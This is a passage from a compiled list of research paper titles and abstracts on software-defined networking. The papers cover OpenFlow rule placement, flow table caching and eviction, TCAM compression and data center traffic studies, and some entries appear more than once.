proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: Maple: simplifying SDN programming using algorithmic policies paper_content: Software-Defined Networking offers the appeal of a simple, centralized programming model for managing complex networks. However, challenges in managing low-level details, such as setting up and maintaining correct and efficient forwarding tables on distributed switches, often compromise this conceptual simplicity. In this pa- per, we present Maple, a system that simplifies SDN programming by (1) allowing a programmer to use a standard programming language to design an arbitrary, centralized algorithm, which we call an algorithmic policy, to decide the behaviors of an entire network, and (2) providing an abstraction that the programmer-defined, centralized policy runs, conceptually, "afresh" on every packet entering a network, and hence is oblivious to the challenge of translating a high-level policy into sets of rules on distributed individual switches. To implement algorithmic policies efficiently, Maple includes not only a highly-efficient multicore scheduler that can scale efficiently to controllers with 40+ cores, but more importantly a novel tracing runtime optimizer that can automatically record reusable policy decisions, offload work to switches when possible, and keep switch flow tables up-to-date by dynamically tracing the dependency of policy decisions on packet contents as well as the environment (system state). Evaluations using real HP switches show that Maple optimizer reduces HTTP connection time by a factor of 100 at high load. During simulated benchmarking, Maple scheduler, when not running the optimizer, achieves a throughput of over 20 million new flow requests per second on a single machine, with 95-percentile latency under 10 ms. --- paper_title: Frenetic: a network programming language paper_content: Modern networks provide a variety of interrelated services including routing, traffic monitoring, load balancing, and access control. Unfortunately, the languages used to program today's networks lack modern features - they are usually defined at the low level of abstraction supplied by the underlying hardware and they fail to provide even rudimentary support for modular programming. As a result, network programs tend to be complicated, error-prone, and difficult to maintain. This paper presents Frenetic, a high-level language for programming distributed collections of network switches. Frenetic provides a declarative query language for classifying and aggregating network traffic as well as a functional reactive combinator library for describing high-level packet-forwarding policies. Unlike prior work in this domain, these constructs are - by design - fully compositional, which facilitates modular reasoning and enables code reuse. This important property is enabled by Frenetic's novel run-time system which manages all of the details related to installing, uninstalling, and querying low-level packet-processing rules on physical switches. Overall, this paper makes three main contributions: (1) We analyze the state-of-the art in languages for programming networks and identify the key limitations; (2) We present a language design that addresses these limitations, using a series of examples to motivate and validate our choices; (3) We describe an implementation of the language and evaluate its performance on several benchmarks. --- paper_title: Optimizing rule placement in software-defined networks for energy-aware routing paper_content: Software-defined Networks (SDN), in particular OpenFlow, is a new networking paradigm enabling innovation through network programmability. Over past few years, many applications have been built using SDN such as server load balancing, virtual-machine migration, traffic engineering and access control. In this paper, we focus on using SDN for energy-aware routing (EAR). Since traffic load has a small influence on power consumption of routers, EAR allows to put unused links into sleep mode to save energy. SDN can collect traffic matrix and then computes routing solutions satisfying QoS while being minimal in energy consumption. However, prior works on EAR have assumed that the table of OpenFlow switch can hold an infinite number of rules. In practice, this assumption does not hold since the flow table is implemented with Ternary Content Addressable Memory (TCAM) which is expensive and power-hungry. In this paper, we propose an optimization method to minimize energy consumption for a backbone network while respecting capacity constraints on links and rule space constraints on routers. In details, we present an exact formulation using Integer Linear Program (ILP) and introduce efficient greedy heuristic algorithm. Based on simulations, we show that using this smart rule space allocation, it is possible to save almost as much power consumption as the classical EAR approach. --- paper_title: Openflow-based server load balancing gone wild paper_content: Today's data centers host online services on multiple servers, with a front-end load balancer directing each client request to a particular replica. Dedicated load balancers are expensive and quickly become a single point of failure and congestion. The OpenFlow standard enables an alternative approach where the commodity network switches divide traffic over the server replicas, based on packet-handling rules installed by a separate controller. However, the simple approach of installing a separate rule for each client connection (or "microflow") leads to a huge number of rules in the switches and a heavy load on the controller. We argue that the controller should exploit switch support for wildcard rules for a more scalable solution that directs large aggregates of client traffic to server replicas. We present algorithms that compute concise wildcard rules that achieve a target distribution of the traffic, and automatically adjust to changes in load-balancing policies without disrupting existing connections. We implement these algorithms on top of the NOX OpenFlow controller, evaluate their effectiveness, and propose several avenues for further research. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: Optimizing rules placement in OpenFlow networks: trading routing for better efficiency paper_content: The idea behind Software Defined Networking (SDN) is to conceive the network as one programmable entity rather than a set of devices to manually configure, and OpenFlow meets this objective. In OpenFlow, a centralized programmable controller installs rules onto switches to implement policies. However, this flexibility comes at the expense of extra overhead as the number of rules might exceed the memory capacity of switches, which raises the question of how to place most profitable rules on board. Solutions proposed so far strictly impose paths to be followed inside the network. We advocate instead that we can trade routing requirements within the network to concentrate on where to forward traffic, not how to do it. As an illustration of the concept, we propose an optimization problem that gets the maximum amount of traffic delivered according to policies and the actual dimensioning of the network. The traffic that cannot be accommodated is forwarded to the controller that has the capacity to process it further. We also demonstrate that our approach permits a better utilization of scarce resources in the network. --- paper_title: MoRule: Optimized rule placement for mobile users in SDN-enabled access networks paper_content: With the surging popularity of smartphones and tablets, mobile network traffic has dramatically increased in recent years. Software defined network (SDN) provides a scalable and flexible structure to simplify network traffic management. It has been shown that rule placement plays an important role in the performance of SDN. However, since most existing work considers static network topologies of wired networks, it cannot be directly applied for mobile networks. In this paper, we propose MoRule, an efficient rule management scheme to optimize the rule placement for mobile users. To deal with the challenges of user mobility and rule capacity constraints of switches, we design a heuristic algorithm with low-complexity to minimize the rule space occupation while guaranteeing that the mobile traffic processed by local switches is no less than a threshold. By conducting extensive simulations, we demonstrate that our proposed algorithm significantly outperforms random solutions under various network settings. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: Maturing of OpenFlow and Software Defined Networking through Deployments paper_content: Software-defined Networking (SDN) has emerged as a new paradigm of networking that enables network operators, owners, vendors, and even third parties to innovate and create new capabilities at a faster pace. The SDN paradigm shows potential for all domains of use, including data centers, cellular providers, service providers, enterprises, and homes. Over a three-year period, we deployed SDN technology at our campus and at several other campuses nation-wide with the help of partners. These deployments included the first-ever SDN prototype in a lab for a (small) global deployment. The four-phased deployments and demonstration of new networking capabilities enabled by SDN played an important role in maturing SDN and its ecosystem. We share our experiences and lessons learned that have to do with demonstration of SDN's potential; its influence on successive versions of OpenFlow specification; evolution of SDN architecture; performance of SDN and various components; and growing the ecosystem. --- paper_title: Network traffic characteristics of data centers in the wild paper_content: Although there is tremendous interest in designing improved networks for data centers, very little is known about the network-level traffic characteristics of data centers today. In this paper, we conduct an empirical study of the network traffic in 10 data centers belonging to three different categories, including university, enterprise campus, and cloud data centers. Our definition of cloud data centers includes not only data centers employed by large online service providers offering Internet-facing applications but also data centers used to host data-intensive (MapReduce style) applications). We collect and analyze SNMP statistics, topology and packet-level traces. We examine the range of applications deployed in these data centers and their placement, the flow-level and packet-level transmission properties of these applications, and their impact on network and link utilizations, congestion and packet drops. We describe the implications of the observed traffic patterns for data center internal traffic engineering as well as for recently proposed architectures for data center networks. --- paper_title: FlowMaster: Early Eviction of Dead Flow on SDN Switches paper_content: High performance switches employ extremely low latency memory subsystems in an effort to reap the lowest feasible end-to-end flow level latencies. Their capacities are extremely valuable as the size of these memories is limited due to several architectural constraints such as power and silicon area. This necessity is further exacerbated with the emergence of Software Defined Networks SDN where fine-grained flow definitions lead to explosion in the number of flow entries. In this paper, we propose FlowMaster, a speculative mechanism to update the flow table by predicting when an entry becomes stale and evict the same early to accommodate new entries. We collage the observations from predictors into a Markov based learning predictor that predicts whether a flow is valuable any more. Our experiments confirm that FlowMaster enables efficient usage of flow tables thereby reducing the discard rate from flow table by orders of magnitude and in some cases, eliminating discards completely. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. Unlike traditional caching solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we ``splice'' long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). --- paper_title: Scalable rule management for data centers paper_content: Cloud operators increasingly need more and more fine-grained rules to better control individual network flows for various traffic management policies. In this paper, we explore automated rule management in the context of a system called vCRIB (a virtual Cloud Rule Information Base), which provides the abstraction of a centralized rule repository. The challenge in our approach is the design of algorithms that automatically off-load rule processing to overcome resource constraints on hypervisors and/or switches, while minimizing redirection traffic overhead and responding to system dynamics. vCRIB contains novel algorithms for finding feasible rule placements and adapting traffic overhead induced by rule placement in the face of traffic changes and VM migration. We demonstrate that vCRIB can find feasible rule placements with less than 10% traffic overhead even in cases where the traffic-optimal rule placement may be infeasible with respect to hypervisor CPU or memory constraints. --- paper_title: SwitchReduce: Reducing switch state and controller involvement in OpenFlow networks paper_content: OpenFlow is a popular network architecture where a logically centralized controller (the control plane) is physically decoupled from all forwarding switches (the data plane). Through this controller, the OpenFlow framework enables flow level granularity in switches thereby providing monitoring and control over each individual flow. Among other things, this architecture comes at the cost of placing significant stress on switch state size and overburdening the controller in various traffic engineering scenarios such as dynamic re-routing of flows. Storing a flow match rule and flow counter at every switch along a flow's path results in many thousands of entries per switch. Dynamic rerouting of a flow, either in an attempt to utilize less congested paths, or as a consequence of virtual machine migration, results in controller intervention at every switch along the old and new paths. In the absence of careful orchestration of flow storage and controller involvement, OpenFlow will be unable to scale to anticipated production data center sizes. In this context, we present SwitchReduce - a system to reduce switch state and controller involvement in OpenFlow networks. SwitchReduce is founded on the observation that the number of flow match rules at any switch should be no more than the set of unique processing actions it has to take on incoming flows. Additionally, the flow counters for every unique flow may be maintained at only one switch in the network. We have implemented SwitchReduce as a NOX controller application. Simulation results with real data center traffic traces reveal that SwitchReduce can reduce flow entries by up to approximately 49% on first hop switches, and up to 99.9% on interior switches, while reducing flow counters by 75% on average. --- paper_title: vCRIB: virtualized rule management in the cloud paper_content: Cloud operators increasingly need many fine-grained rules to better control individual network flows for various management tasks. While previous approaches have advocated placing rules either on hypervisors or switches, we argue that future data centers would benefit from leveraging rule processing capabilities at both for better scalability and performance. In this paper, we propose vCRIB, a virtualized Cloud Rule Information Base that allows operators to freely define different management policies without the need to consider underlying resource constraints. The challenge in our approach is the design of a vCRIB manager that automatically partitions and places rules at both hypervisors and switches to achieve a good trade-off between resource usage and performance. --- paper_title: PAST: scalable ethernet for data centers paper_content: We present PAST, a novel network architecture for data center Ethernet networks that implements a Per-Address Spanning Tree routing algorithm. PAST preserves Ethernet's self-configuration and mobility support while increasing its scalability and usable bandwidth. PAST is explicitly designed to accommodate unmodified commodity hosts and Ethernet switch chips. Surprisingly, we find that PAST can achieve performance comparable to or greater than Equal-Cost Multipath (ECMP) forwarding, which is currently limited to layer-3 IP networks, without any multipath hardware support. In other words, the hardware and firmware changes proposed by emerging standards like TRILL are not required for high-performance, scalable Ethernet networks. We evaluate PAST on Fat Tree, HyperX, and Jellyfish topologies, and show that it is able to capitalize on the advantages each offers. We also describe an OpenFlow-based implementation of PAST in detail. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: Shadow MACs: scalable label-switching for commodity ethernet paper_content: While SDN promises fine-grained, dynamic control of the network, in practice limited switch TCAM rule space restricts most forwarding to be coarse-grained. As an alternative, we demonstrate that using destination MAC addresses as opaque forwarding labels allows an SDN controller to leverage large MAC (L2) forwarding tables to manage a plethora of fine-grained paths. In this shadow MAC model, the SDN controller can install MAC rewrite rules at the network edge to guide traffic on to intelligently selected paths to balance traffic, avoid failed links, or route flows through middleboxes. Further, by decoupling the network edge from the core, we address many other problems with SDN, including consistent network updates, fast rerouting, and multipathing with end-to-end control. --- paper_title: Effective switch memory management in OpenFlow networks paper_content: OpenFlow networks require installation of flow rules in a limited capacity switch memory (Ternary Content Addressable Memory or TCAMs, in particular) from a logically centralized controller. A controller can manage the switch memory in an OpenFlow network through events that are generated by the switch at discrete time intervals. Recent studies have shown that data centers can have up to 10,000 network flows per second per server rack today. Increasing the TCAM size to accommodate these large number of flow rules is not a viable solution since TCAM is costly and power hungry. Current OpenFlow controllers handle this issue by installing flow rules with a default idle timeout after which the switch automatically evicts the rule from its TCAM. This results in inefficient usage of switch memory for short lived flows when the timeout is too high and in increased controller workload for frequent flows when the timeout is too low. In this context, we present SmartTime - an OpenFlow controller system that combines an adaptive timeout heuristic to compute efficient idle timeouts with proactive eviction of flow rules, which results in effective utilization of TCAM space while ensuring that TCAM misses (or controller load) does not increase. To the best of our knowledge, SmartTime is the first real implementation of an intelligent flow management strategy in an OpenFlow controller that can be deployed in current OpenFlow networks. In our experiments using multiple real data center packet traces and cache sizes, SmartTime adaptive policy consistently outperformed the best performing static idle timeout policy or random eviction policy by up to 58% in terms of total cost. --- paper_title: A flow entry management scheme for reducing controller overhead paper_content: In this paper, we advocate addressing the communication overhead problem between OpenFlow controllers and OpenFlow switches due to table-miss in a flow table. It may cause the communication overhead between controllers and switches because a switch has to send packet-in message to a controller for processing table-missed flows. We propose a simple flow entry management scheme for reducing the controller overhead by increasing the flow entry matching ratio. By using an LRU caching algorithm, a switch can keep the flow entries in a flow table as many as possible, and then the flow entry matching ratio can be increased. --- paper_title: Network traffic characteristics of data centers in the wild paper_content: Although there is tremendous interest in designing improved networks for data centers, very little is known about the network-level traffic characteristics of data centers today. In this paper, we conduct an empirical study of the network traffic in 10 data centers belonging to three different categories, including university, enterprise campus, and cloud data centers. Our definition of cloud data centers includes not only data centers employed by large online service providers offering Internet-facing applications but also data centers used to host data-intensive (MapReduce style) applications). We collect and analyze SNMP statistics, topology and packet-level traces. We examine the range of applications deployed in these data centers and their placement, the flow-level and packet-level transmission properties of these applications, and their impact on network and link utilizations, congestion and packet drops. We describe the implications of the observed traffic patterns for data center internal traffic engineering as well as for recently proposed architectures for data center networks. --- paper_title: An adaptive scheme for data forwarding in software defined network paper_content: Software Defined Network (SDN) is undergoing an increasingly high popularity among various schemes of networking deployment. The main advantage of SDN lies in its flexibility in controlling network traffic, which arises from decoupling the control plane and the data plane of network devices. However, despite of the valuable merits of SDN, the outage of data forwarding should not be ignored. The drawback mainly results from the length limitation of switch flow tables, the congestion between controllers and switches, and the deficiency of the controller capacity, which are all closely related to the timeout mechanism of flow table. In our study, the deficiency of SDN system will be analyzed explicitly. Moreover, we propose an adaptive control mechanism aiming at optimizing the idle timeout reset of flow tables and cooperation between controllers and switches. Our mechanism achieves higher matching ratio of flow tables as well as alleviates the congestion in the control channel, enabling more fluent data forwarding in SDN. --- paper_title: FlowMaster: Early Eviction of Dead Flow on SDN Switches paper_content: High performance switches employ extremely low latency memory subsystems in an effort to reap the lowest feasible end-to-end flow level latencies. Their capacities are extremely valuable as the size of these memories is limited due to several architectural constraints such as power and silicon area. This necessity is further exacerbated with the emergence of Software Defined Networks SDN where fine-grained flow definitions lead to explosion in the number of flow entries. In this paper, we propose FlowMaster, a speculative mechanism to update the flow table by predicting when an entry becomes stale and evict the same early to accommodate new entries. We collage the observations from predictors into a Markov based learning predictor that predicts whether a flow is valuable any more. Our experiments confirm that FlowMaster enables efficient usage of flow tables thereby reducing the discard rate from flow table by orders of magnitude and in some cases, eliminating discards completely. --- paper_title: An efficient flow cache algorithm with improved fairness in Software-Defined Data Center Networks paper_content: The use of Software-Defined Networking (SDN) with OpenFlow-enabled switches in Data Centers has received much attention from researchers and industries. One of the major issues in OpenFlow switch is the limited size of the flow table resulting in evictions of flows from the flow table. From Data Center traffic characteristics, we observe that elephant flows are very large in size (data volume) but few in numbers when compared to mice flows. Thus, Elephant flows are more likely to be evicted, due to the limited size of the switch flow table causing additional traffic to the controller. We propose a differential flow cache framework that achieves fairness and efficient cache maintenance with fast lookup and reduced cache miss ratio. The framework uses a hash-based placement and localized Least Recently Used (LRU)-based replacement mechanisms. --- paper_title: Rule Optimization for Real-Time Query Service in Software-Defined Internet of Vehicles paper_content: Internet of Vehicles (IoV) has recently gained considerable attentions from both industry and research communities since the development of communication technology and smart city. However, a proprietary and closed way of operating hardwares in network equipments slows down the progress of new services deployment and extension in IoV. Moreover, the tightly coupled control and data planes in traditional networks significantly increase the complexity and cost of network management. By proposing a novel architecture, called Software-Defined Internet of Vehicles (SDIV), we adopt the software-defined network (SDN) architecture to address these problems by leveraging its separation of the control plane from the data plane and a uniform way to configure heterogeneous switches. However, the characteristics of IoV introduce the very challenges in rule installation due to the limited size of Flow Tables at OpenFlow-enabled switches which are the main component of SDN. It is necessary to build compact Flow Tables for the scalability of IoV. Accordingly, we develop a rule optimization approach for real-time query service in SDIV. Specifically, we separate wired data plane from wireless data plane and use multicast address in wireless data plane. Furthermore, we introduce a destination-driven model in wired data plane for reducing the number of rules at switches. Experiments show that our rule optimization strategy reduces the number of rules while keeping the performance of data transmission. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: NOX: towards an operating system for networks paper_content: As anyone who has operated a large network can attest, enterprise networks are difficult to manage. That they have remained so despite significant commercial and academic efforts suggests the need for a different network management paradigm. Here we turn to operating systems as an instructive example in taming management complexity. In the early days of computing, programs were written in machine languages that had no common abstractions for the underlying physical resources. This made programs hard to write, port, reason about, and debug. Modern operating systems facilitate program development by providing controlled access to high-level abstractions for resources (e.g., memory, storage, communication) and information (e.g., files, directories). These abstractions enable programs to carry out complicated tasks safely and efficiently on a wide variety of computing hardware. In contrast, networks are managed through low-level configuration of individual components. Moreover, these configurations often depend on the underlying network; for example, blocking a user’s access with an ACL entry requires knowing the user’s current IP address. More complicated tasks require more extensive network knowledge; forcing guest users’ port 80 traffic to traverse an HTTP proxy requires knowing the current network topology and the location of each guest. In this way, an enterprise network resembles a computer without an operating system, with network-dependent component configuration playing the role of hardware-dependent machine-language programming. What we clearly need is an “operating system” for networks, one that provides a uniform and centralized programmatic interface to the entire network. Analogous to the read and write access to various resources provided by computer operating systems, a network operating system provides the ability to observe and control a network. A network operating system does not manage the network itself; it merely provides a programmatic interface. Applications implemented on top of the network operating system perform the actual management tasks. The programmatic interface should be general enough to support a broad spectrum of network management applications. Such a network operating system represents two major conceptual departures from the status quo. First, the network operating system presents programs with a centralized programming model; programs are written as if the entire network were present on a single machine (i.e., one would use Dijkstra to compute shortest paths, not Bellman-Ford). This requires (as in [3, 8, 14] and elsewhere) centralizing network state. Second, programs are written in terms of high-level abstractions (e.g., user and host names), not low-level configuration parameters (e.g., IP and MAC addresses). This allows management directives to be enforced independent of the underlying network topology, but it requires that the network operating system carefully maintain the bindings (i.e., mappings) between these abstractions and the low-level configurations. Thus, a network operating system allows management applications to be written as centralized programs over highlevel names as opposed to the distributed algorithms over low-level addresses we are forced to use today. While clearly a desirable goal, achieving this transformation from distributed algorithms to centralized programming presents significant technical challenges, and the question we pose here is: Can one build a network operating system at significant scale? --- paper_title: Constructing optimal IP routing tables paper_content: The Border Gateway Protocol (BGP) populates Internet backbone routers with routes or prefixes. We present an algorithm to locally compute (without any modification to BGP) equivalent forwarding tables that provably contain the minimal number of prefixes. For large backbone routers, the Optimal Routing Table Constructor (ORTC) algorithm that we present produces routing tables with roughly 60% of the original number of prefixes. The publicly available MaeEast database with 41315 prefixes reduces to 23007 prefixes when ORTC is applied. We present performance measurements on four publicly available databases and a formal proof that ORTC does produce the optimal set of routes. --- paper_title: Source flow: handling millions of flows on flow-based nodes paper_content: Flow-based networks such as OpenFlow-based networks have difficulty handling a large number of flows in a node due to the capacity limitation of search engine devices such as ternary content-addressable memory (TCAM). One typical solution of this problem would be to use MPLS-like tunneling, but this approach spoils the advantage of flow-by-flow path selection for load-balancing or QoS. We demonstrate a method named "Source Flow" that allows us to handle a huge amount of flows without changing the granularity of flows. By using our method, expensive and power consuming search engine devices can be removed from the core nodes, and the network can grow pretty scalable. In our demo, we construct a small network that consists of small number of OpenFlow switches, a single OpenFlow controller, and end-hosts. The hosts generate more than one million flows simultaneously and the flows are controlled on a per-flow-basis. All active flows are monitored and visualized on a user interface and the user interface allows audiences to confirm if our method is feasible and deployable. --- paper_title: The joint optimization of rules allocation and traffic engineering in Software Defined Network paper_content: Software-Defined Network (SDN) is a promising network paradigm that separates the control plane and data plane in the network. It has shown great advantages in simplifying network management such that new functions can be easily supported without physical access to the network switches. However, Ternary Content Addressable Memory (TCAM), as a critical hardware storing rules for high-speed packet processing in SDN-enabled devices, can be supplied to each device with very limited quantity because it is expensive and energy-consuming. To efficiently use TCAM resources, we propose a rule multiplexing scheme, in which the same set of rules deployed on each node apply to the whole flow of a session going through but towards different paths. Based on this scheme, we study the rule placement problem with the objective of minimizing rule space occupation for multiple unicast sessions under QoS constraints.We formulate the optimization problem jointly considering routing engineering and rule placement under both existing and our rule multiplexing schemes. Finally, extensive simulations are conducted to show that our proposals significantly outperform existing solutions. --- paper_title: Bit Weaving: A Non-Prefix Approach to Compressing Packet Classifiers in TCAMs paper_content: Ternary content addressable memories (TCAMs) have become the de facto standard in industry for fast packet classification. Unfortunately, TCAMs have limitations of small capacity, high power consumption, high heat generation, and high cost. The well-known range expansion problem exacerbates these limitations as each classifier rule typically has to be converted to multiple TCAM rules. One method for coping with these limitations is to use compression schemes to reduce the number of TCAM rules required to represent a classifier. Unfortunately, all existing compression schemes only produce prefix classifiers. Thus, they all miss the compression opportunities created by non-prefix ternary classifiers. In this paper, we propose bit weaving, the first non-prefix compression scheme. Bit weaving is based on the observation that TCAM entries that have the same decision and whose predicates differ by only one bit can be merged into one entry by replacing the bit in question with . Bit weaving consists of two new techniques, bit swapping and bit merging, to first identify and then merge such rules together. The key advantages of bit weaving are that it runs fast, it is effective, and it is composable with other TCAM optimization methods as a pre/post-processing routine. We implemented bit weaving and conducted experiments on both real-world and synthetic packet classifiers. Our experimental results show the following: 1) bit weaving is an effective standalone compression technique (it achieves an average compression ratio of 23.6%); 2) bit weaving finds compression opportunities that other methods miss. Specifically, bit weaving improves the prior TCAM optimization techniques of TCAM Razor and Topological Transformation by an average of 12.8% and 36.5%, respectively. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. Unlike traditional caching solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we ``splice'' long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). --- paper_title: Compressing rectilinear pictures and minimizing access control lists paper_content: We consider a geometric model for the problem of minimizing access control lists (ACLs) in network routers, a model that also has applications to rectilinear picture compression and figure drawing in common graphics software packages. Here the goal is to create a colored rectilinear pattern within an initially white rectangular canvas, and the basic operation is to choose a subrectangle and paint it a single color, overwriting all previous colors in the rectangle. Rectangle Rule List (RRL) minimization is the problem of finding the shortest list of rules needed to create a given pattern. ACL minimization is a restricted version of this problem where the set of allowed rectangles must correspond to pairs of IP address prefixes. Motivated by the ACL application, we study the special cases of RRL and ACL minimization in which all rectangles must be strips that extend either the full width or the full height of the canvas (strip-rules). We provide several equivalent characterizations of the patterns achievable using strip-rules and present polynomial-time algorithms for optimally constructing such patterns when, as in the ACL application, the only colors are black and white (permit or deny). We also show that RRL minimization is NP-hard in general and provide O(min(n1/3, OPT1/2))-approximation algorithms for general RRL and ACL minimization by exploiting our results about strip-rule patterns. --- paper_title: Rule Optimization for Real-Time Query Service in Software-Defined Internet of Vehicles paper_content: Internet of Vehicles (IoV) has recently gained considerable attentions from both industry and research communities since the development of communication technology and smart city. However, a proprietary and closed way of operating hardwares in network equipments slows down the progress of new services deployment and extension in IoV. Moreover, the tightly coupled control and data planes in traditional networks significantly increase the complexity and cost of network management. By proposing a novel architecture, called Software-Defined Internet of Vehicles (SDIV), we adopt the software-defined network (SDN) architecture to address these problems by leveraging its separation of the control plane from the data plane and a uniform way to configure heterogeneous switches. However, the characteristics of IoV introduce the very challenges in rule installation due to the limited size of Flow Tables at OpenFlow-enabled switches which are the main component of SDN. It is necessary to build compact Flow Tables for the scalability of IoV. Accordingly, we develop a rule optimization approach for real-time query service in SDIV. Specifically, we separate wired data plane from wireless data plane and use multicast address in wireless data plane. Furthermore, we introduce a destination-driven model in wired data plane for reducing the number of rules at switches. Experiments show that our rule optimization strategy reduces the number of rules while keeping the performance of data transmission. --- paper_title: Palette: Distributing tables in software-defined networks paper_content: In software-defined networks (SDNs), the network controller first formulates abstract network-wide 